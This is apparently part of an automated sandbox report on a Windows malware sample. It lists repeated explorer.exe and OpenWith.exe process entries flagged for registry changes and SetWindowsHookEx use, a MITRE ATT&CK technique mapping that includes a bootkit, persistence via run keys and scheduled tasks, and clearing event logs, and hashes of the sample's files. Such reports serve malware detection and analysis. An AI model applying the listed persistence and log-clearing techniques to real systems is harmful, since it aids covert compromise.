C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:2620
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:100
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4796
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:4416
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4108
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:316
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2880
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:1588
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4652
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:4216
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1408
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:816
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:5080
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:4312
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2884
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:4892
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2312
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:700
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2740
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:3104
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1712
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:1812
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3540
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:3252
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3116
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:4876
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4816
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:1220
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2416
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:4376
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:456
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:2476
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4816
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:4992
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:5052
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:1636
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3348
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:4712
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4640
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
2Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5b2c48139d73e114f0dd8a51776f53da7
SHA131fe5302b333385cc7fd6c6782ee47e004eab8c5
SHA2565bcc624bbe68ea59a7beffaea3b36b29555ba9f87069ef1b501cb878cb996db3
SHA512e87d5bbbd399145886da9e4b81a6d7b9fb70fce7601175847e6529c9826e9d1afa53cda7de60a64efd075c3eadb9b5cdb29ecf7eb30a842b71a142e0edda8446
-
Filesize
18KB
MD5bf36977cbd2e9e0f18794bc75f3183cc
SHA135c482ed129167adfa14d96fd255eee2dca3a1b0
SHA2568fdcc3582b69c9d3de4f71191425d749192d0e3305153d35ba6ef856bc372c78
SHA512acaa725aa6aeeb46fe4cecc06e27e473da23a0d0f6a2ee28429f9b53ab7eb4b7ddfb66b2290a2c1de682bc18eb9aa8ab168bd17cdec7008e61ae205380597103
-
Filesize
37KB
MD51f8c95b97229e09286b8a531f690c661
SHA1b15b21c4912267b41861fb351f192849cca68a12
SHA256557a903f0f2177e3e62b1a534dee554cf2eff3dd3991bc2310f064bf9c7d2152
SHA5120f0e5b85b6ef73ecebcd70ca90ce54c019eec1ea99966c469f357dd3393d0067f591b3690fe0b7922d7ba4aa25ebefd76a092d28c3377e6035720f8630a1a186
-
Filesize
187B
MD5f8d64934fab2165f0eb824278bc7239a
SHA1d0a3ddd6975baa13b802a4a3b51af1d45d179bd4
SHA2564d28ae6cff6430dd27a83843b63ed763ac4e4c5e932979df7faa69077d31792b
SHA5122dd9ab731a4141847e1921e6e36f6c97d6091265e80a71806151ca16646589a3187c6a7245696f75ce564ac21c1f78a325ddfe976a0baa38e7e491a89a9b07a2
-
Filesize
15KB
MD556b2c3810dba2e939a8bb9fa36d3cf96
SHA199ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA2564354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA51227812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e
-
Filesize
447KB
MD558008524a6473bdf86c1040a9a9e39c3
SHA1cb704d2e8df80fd3500a5b817966dc262d80ddb8
SHA2561ef6c1a4dfdc39b63bfe650ca81ab89510de6c0d3d7c608ac5be80033e559326
SHA5128cf492584303523bf6cdfeb6b1b779ee44471c91e759ce32fd4849547b6245d4ed86af5b38d1c6979729a77f312ba91c48207a332ae1589a6e25de67ffb96c31
-
Filesize
2KB
MD56945e272e6f024aebd1bd5aec94212ee
SHA1091926a67d057b0f733edf9dc1d80f93af5398c8
SHA2560294a5215c7c18c33fad034fb154b7c16c3273081a4ab276cb60389a67942013
SHA512dcf3c4794b8c9da575faae6e463b88d5e3dbd91bd7d87a5ac35d16c606f4bffd459736bc5108d57b7700c16f00cfd4e2e744ef0f5c2b2108c59432822490b089
-
Filesize
270KB
MD5e517c44a1d94b26482966357955ae862
SHA161427663e8ad9dcc2e1338511fa934f22a2dfa6f
SHA256e07015ea88987078352d3c581f636fdafd14dd620d85f55a1abf83b45bd29c9c
SHA512985d4137ed1849261aa588082b8afd5e7ce49ab1458283e5bf06850ab5c15b4d4342156fafaef35e969199c5007009220e089fd9d9544c55ef5212b0b2195c8e
-
Filesize
181KB
MD58d4a383b2c666be4f33695921263bb73
SHA19f565101a95a28a9b11f861306d3092417eb006d
SHA25630bbd62a849b00c878ec5a30d66923d9c247623f385e9891874966761f284535
SHA512ac8abd9461577cb9dec411d4e47dab666635c99e3ba2ca42834c9ce502a8892bec6254bf9564dd530aa3cf53de72773a258778d7eef22882c6ee3e57d6602edc
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
37KB
MD5e00dcc76e4dcd90994587375125de04b
SHA16677d2d6bd096ec1c0a12349540b636088da0e34
SHA256c8709f5a8b971d136e2273d66e65449791ca8eba1f47dd767733ea52ee635447
SHA5128df7bc46ef0b2e2d4da6d8f31b102ff4813c6544cb751eb700b79fa0fae780814551b58ec8d19ff29cbf8547709add7eef637a52a217714d1a18b450f6755ec8
-
Filesize
37KB
MD53bc9acd9c4b8384fb7ce6c08db87df6d
SHA1936c93e3a01d5ae30d05711a97bbf3dfa5e0921f
SHA256a3d7de3d70c7673e8af7275eede44c1596156b6503a9614c47bad2c8e5fa3f79
SHA512f8508376d9fb001bce10a8cc56da5c67b31ff220afd01fb57e736e961f3a563731e84d6a6c046123e1a5c16d31f39d9b07528b64a8f432eac7baa433e1d23375
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14KB
MD59d5a0ef18cc4bb492930582064c5330f
SHA12ec4168fd3c5ea9f2b0ab6acd676a5b4a95848c8
SHA2568f5bbcc572bc62feb13a669f856d21886a61888fd6288afd066272a27ea79bb3
SHA5121dc3387790b051c3291692607312819f0967848961bc075799b5a2353efadd65f54db54ddf47c296bb6a9f48e94ec83086a4f8bf7200c64329a73fc7ec4340a4
-
Filesize
12KB
MD5efe44d9f6e4426a05e39f99ad407d3e7
SHA1637c531222ee6a56780a7fdcd2b5078467b6e036
SHA2565ea3b26c6b1b71edaef17ce365d50be963ae9f4cb79b39ec723fe6e9e4054366
SHA5128014b60cef62ff5c94bf6338ee3385962cfc62aaa6c101a607c592ba00aea2d860f52e5f52be2a2a3b35310f135548e8d0b00211bfcf32d6b71198f5d3046b63
-
Filesize
7KB
MD5ecffd3e81c5f2e3c62bcdc122442b5f2
SHA1d41567acbbb0107361c6ee1715fe41b416663f40
SHA2569874ab363b07dcc7e9cd6022a380a64102c1814343642295239a9f120cb941c5
SHA5127f84899b77e3e2c0a35fb4973f4cd57f170f7a22f862b08f01938cf7537c8af7c442ef2ae6e561739023f6c9928f93a59b50d463af6373ed344f68260bc47c76